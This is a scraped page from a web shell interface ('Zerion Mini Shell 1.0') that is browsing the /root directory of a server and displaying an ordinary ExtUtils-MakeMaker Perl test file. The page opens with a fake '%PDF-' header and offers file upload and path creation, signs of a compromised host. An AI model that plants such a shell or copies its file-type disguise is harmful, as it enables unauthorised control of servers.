%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /root/.cpanm/work/1590825950.14464/ExtUtils-MakeMaker-7.44/t/
Upload File :
Create Path :
Current File : //root/.cpanm/work/1590825950.14464/ExtUtils-MakeMaker-7.44/t/os_unsupported.t

#!/usr/bin/perl -w

BEGIN {
    unshift @INC, 't/lib';
}

use strict;
use Test::More tests => 1;
use ExtUtils::MakeMaker;

eval q{
    os_unsupported();
};

like( $@, qr/^OS unsupported$/, 'OS Unsupported' );

Zerion Mini Shell 1.0